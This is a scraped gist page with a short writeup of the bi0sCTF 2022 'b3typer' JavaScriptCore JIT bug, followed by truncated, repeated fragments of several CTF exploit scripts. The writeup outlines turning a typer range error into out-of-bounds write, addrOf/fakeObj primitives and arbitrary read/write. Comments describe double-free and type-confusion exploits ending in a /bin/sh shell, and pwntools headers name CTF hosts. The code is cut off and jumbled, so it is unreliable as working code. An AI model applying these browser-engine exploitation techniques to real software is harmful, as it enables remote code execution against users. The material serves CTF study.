Anand Balaji d4rk-kn1gh7

## writeup.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              2 stars
            
          
                d4rk-kn1gh7
                / writeup.md
            
            
              Created
              January 22, 2023 10:27
            
              
                bi0sCTF 2022 - b3typer
              
          
    Short Writeup


Simple typer bug, range of BitAnd opcode is assumed to be [1, operand] when in reality it is [0, operand].
Use range assumptions to create unchecked integer underflow.
Bypass array bounds checks and obtain OOB write, overwrite size of array to get overlap.
Use double & object array overlap to create addrOf & fakeObj primitives.
Create overlapping fake array using StructureID leak to obtain arbitrary R/W.

The trick here is to convert a checkedAdd node to a normal Add node due to the incorrect range, and cause an unchecked integer underflow. When there is no underflow check, you can cause DFGIntegerRangeOptimization to make incorrect assumptions about bounds, and subsquently remove bounds checks (More details in the comments of the exploit).

  
## exp.js
let ab = new ArrayBuffer(8);
let f64a = new Float64Array(ab);
let u64a = new BigUint64Array(ab);
function f2i(v) {
    f64a[0] = v;
    return u64a[0];
}
function i2f(v) {
    u64a[0] = v;
    return f64a[0];

## exp.js
/*
tl;dr:
Double free an object (a), cause a JsObject (d) to overlap with a non-sparse array (c)
Use this to read addresses as strings, convert back to integers
Use shrstr in JsValue to overwrite array pointer for arbitrary r/w
*/

function hex(x) {
    return "0x" + x.toString(16)
}

## exp.py
def tmp():

    new = 0x4eb9059
    new = 0x4eb9054
    new = 0x4eb905f
    new = 0x4eb006a
    new = 0x4eb905e
    new = 0x4eb3b6a
    new = 0x4eb9058
    new = 0x4eb006a

## exp.js
var tmp_buf = new ArrayBuffer(8)
var f64 = new Float64Array(tmp_buf)
var u32 = new Uint32Array(tmp_buf)
var BASE = 0x100000000

function f2i(f) {
    f64[0] = f
    return u32[0] + BASE*u32[1]
}
function i2f(i) {

## exp.js
var tmp_buf = new ArrayBuffer(8)
var f64 = new Float64Array(tmp_buf)
var u32 = new Uint32Array(tmp_buf)
var BASE = 0x100000000

function f2i(f) {
    f64[0] = f
    return u32[0] + BASE*u32[1]
}
function i2f(i) {

## exp.js
// tl;dr : arbitrary type confusion by removing a CheckStructure node
// Full writeup coming soon :)

var tmp_buf = new ArrayBuffer(8)
var f64 = new Float64Array(tmp_buf)
var u32 = new Uint32Array(tmp_buf)
var BASE = 0x100000000

function f2i(f) {
    f64[0] = f

## exp1.js
/*
Bug: typecasting uint8_t* ab.backingStore to uint16_t* ta.mem while converting ArrayBuffer to Uint16Array,
but not reducing length, allows oob r/w.

Exploit: create ArrayBuffer of same size as JSObject, so that they come consecutively in memory,
use oob r/w to overwrite JSObject metadata, construct arbitrary r/w primitives, overwrite
Array constructor with system, JSState with "/bin/sh"
*/

test = new ArrayBuffer(0x70);

## exp.py
#!/usr/bin/python

from pwn import *
import sys
import ctypes
from ctypes import *

remote_ip, port = 'liars.pwni.ng', 2018
binary = './liarmod'
brkpts = '''

## exp.py
#!/usr/bin/python3

from pwn import *
import sys

remote_ip, port = 'shapes-01.play.midnightsunctf.se', 1111
binary = './chall'
brkpts = '''
'''
	let ab = new ArrayBuffer(8);
	let f64a = new Float64Array(ab);
	let u64a = new BigUint64Array(ab);
	function f2i(v) {
	f64a[0] = v;
	return u64a[0];
	}
	function i2f(v) {
	u64a[0] = v;
	return f64a[0];
	/*
	tl;dr:
	Double free an object (a), cause a JsObject (d) to overlap with a non-sparse array (c)
	Use this to read addresses as strings, convert back to integers
	Use shrstr in JsValue to overwrite array pointer for arbitrary r/w
	*/

	function hex(x) {
	return "0x" + x.toString(16)
	}
	def tmp():

	new = 0x4eb9059
	new = 0x4eb9054
	new = 0x4eb905f
	new = 0x4eb006a
	new = 0x4eb905e
	new = 0x4eb3b6a
	new = 0x4eb9058
	new = 0x4eb006a
	var tmp_buf = new ArrayBuffer(8)
	var f64 = new Float64Array(tmp_buf)
	var u32 = new Uint32Array(tmp_buf)
	var BASE = 0x100000000

	function f2i(f) {
	f64[0] = f
	return u32[0] + BASE*u32[1]
	}
	function i2f(i) {
	// tl;dr : arbitrary type confusion by removing a CheckStructure node
	// Full writeup coming soon :)

	var tmp_buf = new ArrayBuffer(8)
	var f64 = new Float64Array(tmp_buf)
	var u32 = new Uint32Array(tmp_buf)
	var BASE = 0x100000000

	function f2i(f) {
	f64[0] = f
	/*
	Bug: typecasting uint8_t* ab.backingStore to uint16_t* ta.mem while converting ArrayBuffer to Uint16Array,
	but not reducing length, allows oob r/w.

	Exploit: create ArrayBuffer of same size as JSObject, so that they come consecutively in memory,
	use oob r/w to overwrite JSObject metadata, construct arbitrary r/w primitives, overwrite
	Array constructor with system, JSState with "/bin/sh"
	*/

	test = new ArrayBuffer(0x70);
	#!/usr/bin/python

	from pwn import *
	import sys
	import ctypes
	from ctypes import *

	remote_ip, port = 'liars.pwni.ng', 2018
	binary = './liarmod'
	brkpts = '''
	#!/usr/bin/python3

	from pwn import *
	import sys

	remote_ip, port = 'shapes-01.play.midnightsunctf.se', 1111
	binary = './chall'
	brkpts = '''
	'''